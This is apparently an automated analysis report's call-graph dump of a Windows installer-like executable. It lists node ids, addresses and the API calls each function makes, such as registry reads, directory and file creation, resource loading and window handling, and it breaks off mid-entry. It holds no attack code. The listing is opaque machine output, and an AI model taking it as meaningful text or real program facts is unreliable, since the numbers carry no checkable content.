48691->48304 48692->48308 48693->48308 48762->48396 48765 42d795 48764->48765 48765->48401 48767 42d7c1 48766->48767 48767->48405 48769 403400 4 API calls 48768->48769 48770 42d7dc GetModuleHandleA GetProcAddress 48769->48770 48771 42d7f5 48770->48771 48771->48409 48842 42dc54 48772->48842 48774 4775f2 48775 4775f6 48774->48775 48776 477618 48774->48776 48845 42db84 48775->48845 48778 403400 4 API calls 48776->48778 48780 47761f 48778->48780 48780->48424 48781 47760d RegCloseKey 48781->48780 48782 403400 4 API calls 48782->48781 48784 42c376 48783->48784 48785 42c399 48783->48785 48889 42c858 CharPrevA 48784->48889 48890 403494 48785->48890 48788 42c37d 48788->48785 48790 42c388 48788->48790 48791 4035c0 4 API calls 48790->48791 48792 42c396 48791->48792 48792->48448 48794 4035c4 48793->48794 48802 40357c 48793->48802 48795 403450 48794->48795 48797 4035e2 48794->48797 48798 4035d4 48794->48798 48794->48802 48800 4034bc 4 API calls 48795->48800 48804 403464 48795->48804 48796 403490 48796->48452 48801 4034bc 4 API calls 48797->48801 48799 403450 4 API calls 48798->48799 48799->48802 48800->48804 48811 4035f5 48801->48811 48802->48795 48803 4035bf 48802->48803 48805 40358a 48802->48805 48803->48452 48804->48796 48806 402660 4 API calls 48804->48806 48807 4035b4 48805->48807 48808 40359d 48805->48808 48806->48796 48810 4038a4 4 API calls 48807->48810 48809 4038a4 4 API calls 48808->48809 48813 4035a2 48809->48813 48810->48813 48812 403450 4 API calls 48811->48812 48814 403621 48812->48814 48813->48452 48814->48452 48816 4776be 48815->48816 48817 42dc54 RegOpenKeyExA 48816->48817 48818 4776e6 48817->48818 48819 477717 48818->48819 48820 42db84 6 API calls 48818->48820 48819->48460 48821 4776fc 48820->48821 48822 42db84 6 API calls 48821->48822 48823 47770e RegCloseKey 48822->48823 48823->48819 48825 4038a4 4 API calls 48824->48825 48826 42d0f7 48825->48826 48827 42d10e GetEnvironmentVariableA 48826->48827 48831 42d121 48826->48831 48899 42da08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48826->48899 48827->48826 48828 42d11a 48827->48828 48829 403400 4 API calls 48828->48829 48829->48831 48831->48417 48900 42c594 48832->48900 48835 42c7c5 48903 403778 48835->48903 48836 42c7bc 48837 403400 4 API calls 48836->48837 48839 42c7c3 48837->48839 48839->48425 48840->48453 48841->48436 48843 42dc65 RegOpenKeyExA 48842->48843 48844 42dc5f 48842->48844 48843->48774 48844->48843 48848 42da38 48845->48848 48849 42da5e RegQueryValueExA 48848->48849 48855 42da81 48849->48855 48863 42daa3 48849->48863 48850 403400 4 API calls 48851 42db6f 48850->48851 48851->48781 48851->48782 48852 42da9b 48853 403400 4 API calls 48852->48853 48853->48863 48855->48852 48855->48863 48865 4034e0 48855->48865 48870 403744 48855->48870 48857 42dad8 RegQueryValueExA 48857->48849 48858 42daf4 48857->48858 48858->48863 48874 4038a4 48858->48874 48861 403450 4 API calls 48861->48863 48862 403744 4 API calls 48864 42db48 48862->48864 48863->48850 48864->48861 48883 4034bc 48865->48883 48867 4034f0 48868 403400 4 API calls 48867->48868 48869 403508 48868->48869 48869->48855 48871 40374a 48870->48871 48873 40375b 48870->48873 48872 4034bc 4 API calls 48871->48872 48871->48873 48872->48873 48873->48857 48875 4038b1 48874->48875 48882 4038e1 48874->48882 48876 4038da 48875->48876 48879 4038bd 48875->48879 48880 4034bc 4 API calls 48876->48880 48877 403400 4 API calls 48878 4038cb 48877->48878 48878->48862 48878->48864 48888 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48879->48888 48880->48882 48882->48877 48884 4034c0 48883->48884 48885 4034dc 48883->48885 48886 402648 4 API calls 48884->48886 48885->48867 48887 4034c9 48886->48887 48887->48867 48888->48878 48889->48788 48892 403498 48890->48892 48891 4034ba 48891->48448 48892->48891 48894 402660 48892->48894 48895 402664 48894->48895 48896 40266e 48894->48896 48895->48896 48898 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48895->48898 48896->48891 48898->48896 48899->48826 48910 42c59c 48900->48910 48902 42c59b 48902->48835 48902->48836 48904 4037aa 48903->48904 48905 40377d 48903->48905 48906 403400 4 API calls 48904->48906 48905->48904 48908 403791 48905->48908 48907 4037a0 48906->48907 48907->48839 48909 4034e0 4 API calls 48908->48909 48909->48907 48913 42c5ad 48910->48913 48911 42c611 48914 42c60c 48911->48914 48918 42c3b4 IsDBCSLeadByte 48911->48918 48913->48911 48916 42c5cb 48913->48916 48914->48902 48916->48914 48917 42c3b4 IsDBCSLeadByte 48916->48917 48917->48916 48918->48914 48936 45264c 48919->48936 48922 452671 CreateDirectoryA 48923 4526e9 48922->48923 48924 45267b GetLastError 48922->48924 48925 403494 4 API calls 48923->48925 48924->48936 48926 4526f3 48925->48926 48928 403420 4 API calls 48926->48928 48927 450b64 4 API calls 48927->48936 48929 45270d 48928->48929 48931 403420 4 API calls 48929->48931 48932 45271a 48931->48932 48932->48468 48933 42e670 5 API calls 48933->48936 48934 450b34 4 API calls 48934->48936 48936->48922 48936->48927 48936->48933 48936->48934 48979 42d850 48936->48979 49002 4523b8 48936->49002 49021 406cd0 19 API calls 48936->49021 49022 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48936->49022 48938 403580 48937->48938 48939 4035bf 48937->48939 48940 40358a 48938->48940 48946 403450 48938->48946 48939->48473 48941 4035b4 48940->48941 48942 40359d 48940->48942 48945 4038a4 4 API calls 48941->48945 48944 4038a4 4 API calls 48942->48944 48943 403490 48943->48473 48950 4035a2 48944->48950 48945->48950 48947 4034bc 4 API calls 48946->48947 48948 403464 48946->48948 48947->48948 48948->48943 48949 402660 4 API calls 48948->48949 48949->48943 48950->48473 49096 40d0ac 48951->49096 48967->48476 48968->48491 48970 42e696 48969->48970 48971 4034e0 4 API calls 48970->48971 48972 42e6b3 48971->48972 48973 450b34 48972->48973 48974 450b54 48973->48974 49147 450a0c 48974->49147 48977 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48977->48504 48980 42d0e4 5 API calls 48979->48980 48981 42d876 48980->48981 48984 42d882 48981->48984 49032 42cc24 48981->49032 48983 42d0e4 5 API calls 48985 42d892 48983->48985 48984->48983 48986 42d8ce 48984->48986 48987 42d89e 48985->48987 48990 42cc24 7 API calls 48985->48990 49023 42c6e0 48986->49023 48987->48986 48988 42d8c3 48987->48988 48991 42d0e4 5 API calls 48987->48991 48988->48986 48992 42d774 GetWindowsDirectoryA 48988->48992 48990->48987 48994 42d8b7 48991->48994 48992->48986 48994->48988 48997 42cc24 7 API calls 48994->48997 48995 42c36c 5 API calls 48996 42d8e3 48995->48996 48998 403494 4 API calls 48996->48998 48997->48988 48999 42d8ed 48998->48999 49000 403420 4 API calls 48999->49000 49001 42d907 49000->49001 49001->48936 49003 4523d8 49002->49003 49004 42c36c 5 API calls 49003->49004 49005 4523f1 49004->49005 49006 403494 4 API calls 49005->49006 49013 4523fc 49006->49013 49008 42ca9c 6 API calls 49008->49013 49010 450b64 4 API calls 49010->49013 49013->49008 49013->49010 49014 452478 49013->49014 49054 452344 49013->49054 49062 403634 49013->49062 49068 4515f8 49013->49068 49076 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49013->49076 49015 403494 4 API calls 49014->49015 49016 452483 49015->49016 49017 403420 4 API calls 49016->49017 49018 45249d 49017->49018 49019 403400 4 API calls 49018->49019 49020 4524a5 49019->49020 49020->48936 49021->48936 49022->48936 49035 403738 49023->49035 49026 42c726 49029 403494 4 API calls 49026->49029 49027 42c70f 49027->49026 49028 42c717 49027->49028 49030 4034e0 4 API calls 49028->49030 49031 42c724 49029->49031 49030->49031 49031->48995 49037 42cba8 49032->49037 49036 40373c GetFullPathNameA 49035->49036 49036->49026 49036->49027 49043 42ca9c 49037->49043 49039 42cbca 49040 42cbd2 GetFileAttributesA 49039->49040 49041 403400 4 API calls 49040->49041 49042 42cbef 49041->49042 49042->48984 49044 42c59c IsDBCSLeadByte 49043->49044 49045 42caad 49044->49045 49047 42cad4 49045->49047 49053 42ca20 CharPrevA 49045->49053 49048 42caea 49047->49048 49049 42cadf 49047->49049 49051 403778 4 API calls 49048->49051 49050 403494 4 API calls 49049->49050 49052 42cae8 49050->49052 49051->49052 49052->49039 49053->49045 49055 403400 4 API calls 49054->49055 49056 452365 49055->49056 49059 452392 49056->49059 49077 403510 49056->49077 49080 403800 49056->49080 49060 403400 4 API calls 49059->49060 49061 4523a7 49060->49061 49061->49013 49063 40363c 49062->49063 49064 4034bc 4 API calls 49063->49064 49065 40364f 49064->49065 49066 403450 4 API calls 49065->49066 49067 403677 49066->49067 49084 45132c 49068->49084 49070 45160e 49071 451612 49070->49071 49090 42cc38 49070->49090 49071->49013 49076->49013 49078 4034e0 4 API calls 49077->49078 49079 40351d 49078->49079 49079->49056 49081 403804 49080->49081 49083 40382f 49080->49083 49082 4038a4 4 API calls 49081->49082 49082->49083 49083->49056 49085 451336 49084->49085 49086 45133a 49084->49086 49085->49070 49087 451343 Wow64DisableWow64FsRedirection 49086->49087 49088 45135c SetLastError 49086->49088 49089 451357 49087->49089 49088->49089 49089->49070 49091 42cba8 7 API calls 49090->49091 49092 42cc42 GetLastError 49091->49092 49093 451368 49092->49093 49094 451377 49093->49094 49095 45136d Wow64RevertWow64FsRedirection 49093->49095 49094->49013 49095->49094 49097 40d0b6 49096->49097 49107 40d170 FindResourceA 49097->49107 49099 40d0e4 49100 477a6c 49099->49100 49119 40cf00 49100->49119 49108 40d195 49107->49108 49109 40d19c LoadResource 49107->49109 49117 40d0fc 19 API calls 49108->49117 49110 40d1b6 SizeofResource LockResource 49109->49110 49111 40d1af 49109->49111 49114 40d1d4 49110->49114 49118 40d0fc 19 API calls 49111->49118 49114->49099 49115 40d19b 49115->49109 49116 40d1b5 49116->49110 49117->49115 49118->49116 49124 40cdb0 49119->49124 49121 40cf1a 49136 40cee8 49121->49136 49125 40cdbd 49124->49125 49126 40cdd9 49125->49126 49127 40ce0e 49125->49127 49140 406e28 49126->49140 49144 406de8 CreateFileA 49127->49144 49130 40cde0 49132 40ce07 49130->49132 49143 408c94 19 API calls 49130->49143 49131 40ce18 49131->49132 49145 408c94 19 API calls 49131->49145 49132->49121 49135 40ce3f 49135->49132 49141 403738 49140->49141 49142 406e44 CreateFileA 49141->49142 49142->49130 49143->49132 49144->49131 49145->49135 49148 403400 4 API calls 49147->49148 49156 450a3d 49148->49156 49149 403420 4 API calls 49150 450af5 49149->49150 49150->48977 49151 450a54 49153 40357c 4 API calls 49151->49153 49152 4034e0 4 API calls 49152->49156 49154 450a68 49153->49154 49154->49149 49155 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49155->49156 49156->49151 49156->49152 49156->49154 49156->49155 51035 42e24b SetErrorMode 51036 41fac8 51037 41fad1 51036->51037 51040 41fd6c 51037->51040 51039 41fade 51041 41fe5e 51040->51041 51042 41fd83 51040->51042 51041->51039 51042->51041 51061 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 51042->51061 51044 41fdb9 51045 41fde3 51044->51045 51046 41fdbd 51044->51046 51071 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 51045->51071 51062 41fb0c 51046->51062 51050 41fdf1 51052 41fdf5 51050->51052 51053 41fe1b 51050->51053 51051 41fb0c 10 API calls 51055 41fde1 51051->51055 51056 41fb0c 10 API calls 51052->51056 51054 41fb0c 10 API calls 51053->51054 51057 41fe2d 51054->51057 51055->51039 51058 41fe07 51056->51058 51060 41fb0c 10 API calls 51057->51060 51059 41fb0c 10 API calls 51058->51059 51059->51055 51060->51055 51061->51044 51063 41fb27 51062->51063 51064 41fb3d 51063->51064 51065 41f8ac 4 API calls 51063->51065 51072 41f8ac 51064->51072 51065->51064 51067 41fb85 51068 41fba8 SetScrollInfo 51067->51068 51080 41fa0c 51068->51080 51071->51050 51091 418150 51072->51091 51074 41f8c9 GetWindowLongA 51075 41f906 51074->51075 51076 41f8e6 51074->51076 51094 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 51075->51094 51093 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 51076->51093 51079 41f8f2 51079->51067 51081 41fa1a 51080->51081 51082 41fa22 51080->51082 51081->51051 51083 41fa61 51082->51083 51084 41fa51 51082->51084 51090 41fa5f 51082->51090 51096 417db8 IsWindowVisible ScrollWindow SetWindowPos 51083->51096 51095 417db8 IsWindowVisible ScrollWindow SetWindowPos 51084->51095 51085 41faa1 GetScrollPos 51085->51081 51088 41faac 51085->51088 51089 41fabb SetScrollPos 51088->51089 51089->51081 51090->51085 51092 41815a 51091->51092 51092->51074 51093->51079 51094->51079 51095->51090 51096->51090 51097 420508 51098 42051b 51097->51098 51118 415aa0 51098->51118 51100 420662 51101 420679 51100->51101 51125 414644 KiUserCallbackDispatcher 51100->51125 51106 420690 51101->51106 51126 414688 KiUserCallbackDispatcher 51101->51126 51102 4205c1 51123 4207b8 20 API calls 51102->51123 51107 4206b2 51106->51107 51127 41ffd0 12 API calls 51106->51127 51108 420556 51108->51100 51108->51102 51111 4205b2 MulDiv 51108->51111 51109 4205da 51109->51100 51124 41ffd0 12 API calls 51109->51124 51122 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 51111->51122 51114 4205f7 51115 420613 MulDiv 51114->51115 51116 420636 51114->51116 51115->51116 51116->51100 51117 42063f MulDiv 51116->51117 51117->51100 51119 415ab2 51118->51119 51128 4143e0 51119->51128 51121 415aca 51121->51108 51122->51102 51123->51109 51124->51114 51125->51101 51126->51106 51127->51107 51129 4143fa 51128->51129 51132 4105b8 51129->51132 51131 414410 51131->51121 51135 40de04 51132->51135 51134 4105be 51134->51131 51136 40de66 51135->51136 51137 40de17 51135->51137 51142 40de74 51136->51142 51140 40de74 19 API calls 51137->51140 51141 40de41 51140->51141 51141->51134 51143 40de84 51142->51143 51145 40de9a 51143->51145 51154 40d740 51143->51154 51174 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51143->51174 51157 40e0ac 51145->51157 51148 40d740 5 API calls 51149 40dea2 51148->51149 51149->51148 51150 40df0e 51149->51150 51160 40dcc0 51149->51160 51151 40e0ac 5 API calls 51150->51151 51153 40de70 51151->51153 51153->51134 51175 40eb68 51154->51175 51183 40d61c 51157->51183 51192 40e0b4 51160->51192 51165 40eacc 5 API calls 51166 40dd09 51165->51166 51167 40dd24 51166->51167 51168 40dd1b 51166->51168 51173 40dd21 51166->51173 51208 40db38 51167->51208 51211 40dc28 19 API calls 51168->51211 51171 403420 4 API calls 51172 40ddef 51171->51172 51172->51149 51173->51171 51174->51143 51178 40d8e0 51175->51178 51180 40d8eb 51178->51180 51179 40d74a 51179->51143 51180->51179 51182 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51180->51182 51182->51180 51184 40eb68 5 API calls 51183->51184 51185 40d629 51184->51185 51186 40d63c 51185->51186 51190 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51185->51190 51186->51149 51188 40d637 51191 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51188->51191 51190->51188 51191->51186 51212 40d8c4 51192->51212 51195 40eb68 5 API calls 51196 40e0d8 51195->51196 51198 40dcf3 51196->51198 51215 40e038 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51196->51215 51199 40eacc 51198->51199 51200 40d8e0 5 API calls 51199->51200 51201 40eae1 51200->51201 51202 4034e0 4 API calls 51201->51202 51203 40eaef 51202->51203 51204 403744 4 API calls 51203->51204 51205 40eaf6 51204->51205 51206 40d8e0 5 API calls 51205->51206 51207 40dcfe 51206->51207 51207->51165 51216 40acdc 19 API calls 51208->51216 51210 40db60 51210->51173 51211->51173 51213 40eb68 5 API calls 51212->51213 51214 40d8ce 51213->51214 51214->51195 51214->51198 51215->51198 51216->51210 51217 440dc8 51218 440dd1 51217->51218 51219 440ddf WriteFile 51217->51219 51218->51219 51220 440dea 51219->51220 53845 4135ac SetWindowLongA GetWindowLongA 53846 413609 SetPropA SetPropA 53845->53846 53847 4135eb GetWindowLongA 53845->53847 53851 41f30c 53846->53851 53847->53846 53848 4135fa SetWindowLongA 53847->53848 53848->53846 53856 4151e0 53851->53856 53863 423b7c 53851->53863 53957 4239f4 53851->53957 53852 413659 53857 4151ed 53856->53857 53858 415253 53857->53858 53859 415248 53857->53859 53862 415251 53857->53862 53964 424afc 13 API calls 53858->53964 53859->53862 53965 414fcc 46 API calls 53859->53965 53862->53852 53868 423bb2 53863->53868 53866 423c5c 53869 423c63 53866->53869 53870 423c97 53866->53870 53867 423bfd 53871 423c03 53867->53871 53872 423cc0 53867->53872 53890 423bd3 53868->53890 53966 423ad8 53868->53966 53873 423c69 53869->53873 53908 423f21 53869->53908 53876 423ca2 53870->53876 53877 42400a IsIconic 53870->53877 53874 423c35 53871->53874 53875 423c08 53871->53875 53878 423cd2 53872->53878 53879 423cdb 53872->53879 53881 423e83 SendMessageA 53873->53881 53882 423c77 53873->53882 53874->53890 53906 423c4e 53874->53906 53907 423daf 53874->53907 53884 423d66 53875->53884 53885 423c0e 53875->53885 53886 424046 53876->53886 53887 423cab 53876->53887 53883 42401e GetFocus 53877->53883 53877->53890 53888 423ce8 53878->53888 53889 423cd9 53878->53889 53975 424104 11 API calls 53879->53975 53881->53890 53882->53890 53909 423c30 53882->53909 53931 423ec6 53882->53931 53883->53890 53894 42402f 53883->53894 53980 423af4 NtdllDefWindowProc_A 53884->53980 53895 423c17 53885->53895 53896 423d8e PostMessageA 53885->53896 53995 4247c0 WinHelpA PostMessageA 53886->53995 53892 42405d 53887->53892 53887->53909 53893 42414c 11 API calls 53888->53893 53976 423af4 NtdllDefWindowProc_A 53889->53976 53890->53852 53904 424066 53892->53904 53905 42407b 53892->53905 53893->53890 53994 41ef64 GetCurrentThreadId 73A15940 53894->53994 53901 423c20 53895->53901 53902 423e15 53895->53902 53981 423af4 NtdllDefWindowProc_A 53896->53981 53914 423c29 53901->53914 53915 423d3e IsIconic 53901->53915 53916 423e1e 53902->53916 53917 423e4f 53902->53917 53903 423da9 53903->53890 53918 424444 5 API calls 53904->53918 53996 42449c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53905->53996 53906->53909 53910 423d7b 53906->53910 53970 423af4 NtdllDefWindowProc_A 53907->53970 53908->53890 53927 423f47 IsWindowEnabled 53908->53927 53909->53890 53974 423af4 NtdllDefWindowProc_A 53909->53974 53923 4240e8 12 API calls 53910->53923 53913 424036 53913->53890 53925 42403e SetFocus 53913->53925 53914->53909 53934 423d01 53914->53934 53919 423d5a 53915->53919 53920 423d4e 53915->53920 53983 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53916->53983 53971 423af4 NtdllDefWindowProc_A 53917->53971 53918->53890 53979 423af4 NtdllDefWindowProc_A 53919->53979 53978 423b30 15 API calls 53920->53978 53923->53890 53924 423db5 53932 423df3 53924->53932 53933 423dd1 53924->53933 53925->53890 53927->53890 53936 423f55 53927->53936 53930 423e55 53937 423e6d 53930->53937 53972 41ee14 GetCurrentThreadId 73A15940 53930->53972 53931->53890 53946 423ee8 IsWindowEnabled 53931->53946 53939 4239f4 6 API calls 53932->53939 53982 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53933->53982 53934->53890 53977 422bbc ShowWindow PostMessageA PostQuitMessage 53934->53977 53935 423e26 53941 423e38 53935->53941 53984 41eec8 53935->53984 53949 423f5c IsWindowVisible 53936->53949 53945 4239f4 6 API calls 53937->53945 53948 423dfb PostMessageA 53939->53948 53990 423af4 NtdllDefWindowProc_A 53941->53990 53945->53890 53946->53890 53950 423ef6 53946->53950 53947 423dd9 PostMessageA 53947->53890 53948->53890 53949->53890 53951 423f6a GetFocus 53949->53951 53991 412280 7 API calls 53950->53991 53953 418150 53951->53953 53954 423f7f SetFocus 53953->53954 53992 4151b0 53954->53992 53958 423a7d 53957->53958 53959 423a04 53957->53959 53958->53852 53959->53958 53960 423a0a EnumWindows 53959->53960 53960->53958 53961 423a26 GetWindow GetWindowLongA 53960->53961 53997 42398c GetWindow 53960->53997 53962 423a45 53961->53962 53962->53958 53963 423a71 SetWindowPos 53962->53963 53963->53958 53963->53962 53964->53862 53965->53862 53967 423ae2 53966->53967 53968 423aed 53966->53968 53967->53968 53969 408688 7 API calls 53967->53969 53968->53866 53968->53867 53969->53968 53970->53924 53971->53930 53973 41ee99 53972->53973 53973->53937 53974->53890 53975->53890 53976->53890 53977->53890 53978->53890 53979->53890 53980->53890 53981->53903 53982->53947 53983->53935 53985 41eed0 IsWindow 53984->53985 53986 41eefc 53984->53986 53987 41eeea 53985->53987 53988 41eedf EnableWindow 53985->53988 53986->53941 53987->53985 53987->53986 53989 402660 4 API calls 53987->53989 53988->53987 53989->53987 53990->53890 53991->53890 53993 4151cb SetFocus 53992->53993 53993->53890 53994->53913 53995->53903 53996->53903 53998 4239ad GetWindowLongA 53997->53998 53999 4239b9 53997->53999 53998->53999 54000 467ca8 54001 467cde 54000->54001 54035 467ecb 54000->54035 54003 467d12 54001->54003 54006 467d5c 54001->54006 54007 467d6d 54001->54007 54008 467d3a 54001->54008 54009 467d4b 54001->54009 54010 467d29 54001->54010 54002 403400 4 API calls 54005 467f57 54002->54005 54004 46544c 19 API calls 54003->54004 54003->54035 54019 467d8f 54004->54019 54015 403400 4 API calls 54005->54015 54194 467a18 61 API calls 54006->54194 54195 467c38 40 API calls 54007->54195 54193 4676fc 37 API calls 54008->54193 54036 467844 54009->54036 54192 467594 42 API calls 54010->54192 54018 467f5f 54015->54018 54017 467d2f 54017->54003 54017->54035 54020 48f514 18 API calls 54019->54020 54028 467dd1 54019->54028 54019->54035 54020->54028 54021 465388 19 API calls 54021->54028 54022 414a58 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54022->54028 54023 467eb8 54196 47ddd8 97 API calls 54023->54196 54025 42ca9c 6 API calls 54025->54028 54027 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54027->54028 54028->54021 54028->54022 54028->54023 54028->54025 54028->54027 54030 466fa4 23 API calls 54028->54030 54032 467f39 54028->54032 54028->54035 54077 466ed0 54028->54077 54084 4666d8 54028->54084 54121 47d994 54028->54121 54197 467370 19 API calls 54028->54197 54030->54028 54034 466fa4 23 API calls 54032->54034 54034->54035 54035->54002 54198 468348 54036->54198 54039 4679dc 54041 403400 4 API calls 54039->54041 54040 414a58 4 API calls 54042 467892 54040->54042 54043 4679f1 54041->54043 54045 46789f 54042->54045 54046 4679cd 54042->54046 54044 403420 4 API calls 54043->54044 54047 4679fe 54044->54047 54048 42c7a8 5 API calls 54045->54048 54049 403450 4 API calls 54046->54049 54050 403400 4 API calls 54047->54050 54051 4678ae 54048->54051 54049->54039 54052 467a06 54050->54052 54053 42c36c 5 API calls 54051->54053 54052->54003 54054 4678b9 54053->54054 54201 4547f8 13 API calls 54054->54201 54056 46792b 54056->54039 54057 42cc24 7 API calls 54056->54057 54070 46798b 54056->54070 54058 467964 54057->54058 54063 450b64 4 API calls 54058->54063 54058->54070 54059 4678c6 54059->54056 54061 462e64 19 API calls 54059->54061 54060 42cc24 7 API calls 54062 4679a1 54060->54062 54064 4678f5 54061->54064 54062->54046 54069 450b64 4 API calls 54062->54069 54065 46797b 54063->54065 54066 462e64 19 API calls 54064->54066 54203 479aec 37 API calls 54065->54203 54068 467906 54066->54068 54071 450b34 4 API calls 54068->54071 54072 4679b8 54069->54072 54070->54039 54070->54046 54070->54060 54073 46791b 54071->54073 54204 479aec 37 API calls 54072->54204 54202 479aec 37 API calls 54073->54202 54076 4679c8 54076->54039 54076->54046 54078 466ee1 54077->54078 54079 466edc 54077->54079 54397 466258 45 API calls 54078->54397 54080 466edf 54079->54080 54312 46693c 54079->54312 54080->54028 54082 466ee9 54082->54028 54085 46670b 54084->54085 54413 478b40 54085->54413 54087 466720 54088 466747 54087->54088 54089 466724 54087->54089 54091 46673e 54088->54091 54430 48f418 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54088->54430 54090 463064 20 API calls 54089->54090 54093 46672e 54090->54093 54097 403494 4 API calls 54091->54097 54120 466871 54091->54120 54096 403450 4 API calls 54093->54096 54094 466763 54094->54091 54099 46676b 54094->54099 54095 403400 4 API calls 54100 4668a6 54095->54100 54096->54091 54098 46681a 54097->54098 54101 40357c 4 API calls 54098->54101 54102 466fa4 23 API calls 54099->54102 54100->54028 54103 466827 54101->54103 54104 466778 54102->54104 54105 40357c 4 API calls 54103->54105 54431 42ef34 54104->54431 54107 466834 54105->54107 54109 40357c 4 API calls 54107->54109 54111 466841 54109->54111 54113 40357c 4 API calls 54111->54113 54112 4667ba 54114 403450 4 API calls 54112->54114 54115 46684f 54113->54115 54116 4667ca 54114->54116 54117 414a88 4 API calls 54115->54117 54116->54028 54118 466860 54117->54118 54119 46339c 11 API calls 54118->54119 54119->54120 54120->54095 54122 468348 42 API calls 54121->54122 54123 47d9d7 54122->54123 54124 47d9e0 54123->54124 54653 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54123->54653 54126 414a58 4 API calls 54124->54126 54127 47d9f0 54126->54127 54128 403450 4 API calls 54127->54128 54129 47d9fd 54128->54129 54480 468658 54129->54480 54132 47da0d 54134 414a58 4 API calls 54132->54134 54135 47da1d 54134->54135 54136 403450 4 API calls 54135->54136 54137 47da2a 54136->54137 54138 466040 SendMessageA 54137->54138 54139 47da43 54138->54139 54140 47da81 54139->54140 54655 4751b4 23 API calls 54139->54655 54142 42414c 11 API calls 54140->54142 54143 47da8b 54142->54143 54144 47dab1 54143->54144 54145 47da9c SetActiveWindow 54143->54145 54509 47cf98 54144->54509 54145->54144 54192->54017 54193->54003 54194->54003 54195->54003 54196->54035 54197->54028 54205 4683d4 54198->54205 54201->54059 54202->54056 54203->54070 54204->54076 54206 414a58 4 API calls 54205->54206 54207 468406 54206->54207 54259 4630fc 54207->54259 54210 414a88 4 API calls 54211 468418 54210->54211 54212 468427 54211->54212 54215 468440 54211->54215 54289 479aec 37 API calls 54212->54289 54214 46843b 54216 403420 4 API calls 54214->54216 54217 468487 54215->54217 54219 46846e 54215->54219 54218 467876 54216->54218 54220 4684ec 54217->54220 54233 46848b 54217->54233 54218->54039 54218->54040 54290 479aec 37 API calls 54219->54290 54292 42ca28 CharNextA 54220->54292 54223 4684fb 54224 4684ff 54223->54224 54227 468518 54223->54227 54293 479aec 37 API calls 54224->54293 54226 4684d3 54291 479aec 37 API calls 54226->54291 54228 46853c 54227->54228 54268 46326c 54227->54268 54294 479aec 37 API calls 54228->54294 54232 46852c 54232->54228 54273 46329c 54232->54273 54233->54226 54233->54227 54236 468555 54237 403778 4 API calls 54236->54237 54238 46856b 54237->54238 54277 42c878 54238->54277 54241 46857c 54295 4632f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54241->54295 54242 4685aa 54244 42c7a8 5 API calls 54242->54244 54246 4685b5 54244->54246 54245 46858f 54247 450b64 4 API calls 54245->54247 54248 42c36c 5 API calls 54246->54248 54250 46859c 54247->54250 54249 4685c0 54248->54249 54251 42ca9c 6 API calls 54249->54251 54296 479aec 37 API calls 54250->54296 54253 4685cb 54251->54253 54281 468368 54253->54281 54255 4685d3 54256 42cc24 7 API calls 54255->54256 54257 4685db 54256->54257 54257->54214 54297 479aec 37 API calls 54257->54297 54264 463116 54259->54264 54261 42ca9c 6 API calls 54261->54264 54262 403450 4 API calls 54262->54264 54263 406b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54263->54264 54264->54261 54264->54262 54264->54263 54265 46315f 54264->54265 54298 42c988 54264->54298 54266 403420 4 API calls 54265->54266 54267 463179 54266->54267 54267->54210 54270 463276 54268->54270 54269 463297 54269->54232 54270->54269 54271 463289 54270->54271 54309 42ca18 CharNextA 54270->54309 54271->54232 54274 4632a6 54273->54274 54275 4632d3 54274->54275 54310 42ca18 CharNextA 54274->54310 54275->54228 54275->54236 54278 42c8d1 54277->54278 54279 42c88e 54277->54279 54278->54241 54278->54242 54279->54278 54311 42ca18 CharNextA 54279->54311 54282 4683cd 54281->54282 54283 46837b 54281->54283 54282->54255 54283->54282 54284 41ee14 2 API calls 54283->54284 54285 46838b 54284->54285 54286 4683a5 SHPathPrepareForWriteA 54285->54286 54287 41eec8 6 API calls 54286->54287 54288 4683c5 54287->54288 54288->54255 54289->54214 54290->54214 54291->54214 54292->54223 54293->54214 54294->54214 54295->54245 54296->54214 54297->54214 54299 403494 4 API calls 54298->54299 54300 42c998 54299->54300 54301 403744 4 API calls 54300->54301 54304 42c9ce 54300->54304 54307 42c3b4 IsDBCSLeadByte 54300->54307 54301->54300 54303 42ca12 54303->54264 54304->54303 54306 4037b8 4 API calls 54304->54306 54308 42c3b4 IsDBCSLeadByte 54304->54308 54306->54304 54307->54300 54308->54304 54309->54270 54310->54274 54311->54279 54314 466983 54312->54314 54313 466dfb 54316 466e16 54313->54316 54317 466e47 54313->54317 54314->54313 54315 466a3e 54314->54315 54319 403494 4 API calls 54314->54319 54318 466a5f 54315->54318 54322 466aa0 54315->54322 54320 403494 4 API calls 54316->54320 54321 403494 4 API calls 54317->54321 54323 403494 4 API calls 54318->54323 54324 4669c2 54319->54324 54325 466e24 54320->54325 54326 466e55 54321->54326 54330 403400 4 API calls 54322->54330 54327 466a6d 54323->54327 54328 414a58 4 API calls 54324->54328 54409 465934 12 API calls 54325->54409 54410 465934 12 API calls 54326->54410 54332 414a58 4 API calls 54327->54332 54333 4669e3 54328->54333 54335 466a9e 54330->54335 54337 466a8e 54332->54337 54338 403634 4 API calls 54333->54338 54334 466e32 54336 403400 4 